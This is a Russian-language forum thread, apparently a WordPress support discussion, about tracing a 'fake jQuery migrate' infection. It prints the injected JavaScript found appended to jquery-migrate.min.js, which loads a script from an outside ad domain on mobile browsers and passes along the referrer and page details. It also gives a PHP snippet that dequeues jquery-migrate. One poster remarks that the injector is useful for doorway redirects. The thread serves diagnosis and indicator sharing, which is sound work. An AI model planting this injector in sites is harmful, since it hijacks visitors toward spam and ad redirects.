Отловить spam вирус — Fake Jquery migrate
В шапку сайта добавляется url
<script src="https://hostru.online/nHpGrk?se_referrer=&default_keyword=site%20-%20%D0%A1%D0%BE%D0%B1%D0%B8%D1%80%D0%B0%D0%B9%20%D1%81%D0%BE%20%D0%9C%D0%BD%D0%BE%D0%B9!&&frm=script&_cid=17700e5c-9ece-508b-44a9-115b79d0ff75"></script>
Тема вроде бы чиста, как узнать какой скрипт дописывает ? какими средствами уловить ?
и самое интересное что эта зараза выскакивает только с мобильной версии.
РЕШЕНИЕ:
Пока что залез в инструменты браузера
1 посмотреть код
2 вкладка NETWORK
3 выставил мобильную версию
4 отключил кеш в настройках NETWORK
5 обновил страницу
6 в логах через фильтр нашел код
7 в инфе сбоку уже появилась информация откуда берется вредный код.
дописалась в конце зараза:
\wp-includes\js\jquery\jquery-migrate.min.js
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|BB|PlayBook|IEMobile|Windows Phone|Kindle|Silk|Opera Mini/i.test(navigator.userAgent)) {
var d = document;
var s = d.createElement('script');
s.src = 'https://hostru.online/nHpGrk?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&' + window.location.search.replace('?', '&') + '&frm=script&_cid=17700e5c-9ece-508b-44a9-115b79d0ff75';
d.getElementsByTagName('head')[0].appendChild(s);
}
Домены и индикаторы оставил, может у кото-то тоже болячка вскочит.
так же полезная штука для тех кто хочет перенаправление сделать на js для подходящих браузеров и создать статистику переходов, мне иногда такой код нужен был, чтоб соцсети отлавливать и дорвеи.
Каким то боком был дописан код в конец js файла.
Больше ничего не менялось.
Этот код если добавить в js файл любой, будет создавать небольшую часть кода при подгрузке страницы и пихать код в шапку, тема сайта никак не затрагивается. А дальше будет редирект на рекламу 1-2 раза в сутки.
Самое обидное что я не посмотрел когда файл правили.
В нете куча статей по запросу "Fake Jquery migrate".
Это те кто знает, а когда далек, все сложно. Разновидностей я так понял много. Мне легкая попалась, просто с дописанным кодом что показал выше.
Если бы программист был по умнее и не затрагивал главную страницу, я бы наверно с пол года не замечал инъекцию и редирект на ADS сайт
Да, интересно как они туда прописывают, htaccess помогает или нет? А так в качестве быстрого решения можно отрубить migrate, так как он в большинстве случаев не нужен..
add_filter( 'wp_default_scripts', 'remove_jquery_migrate' );
function remove_jquery_migrate( $scripts ) {
if ( empty( $scripts->registered['jquery'] ) || is_admin() ) {
return;
}
$deps = & $scripts->registered['jquery']->deps;
$deps = array_diff( $deps, [ 'jquery-migrate' ] );
} 
PHP добавляет или в шаблон суется, или это JS?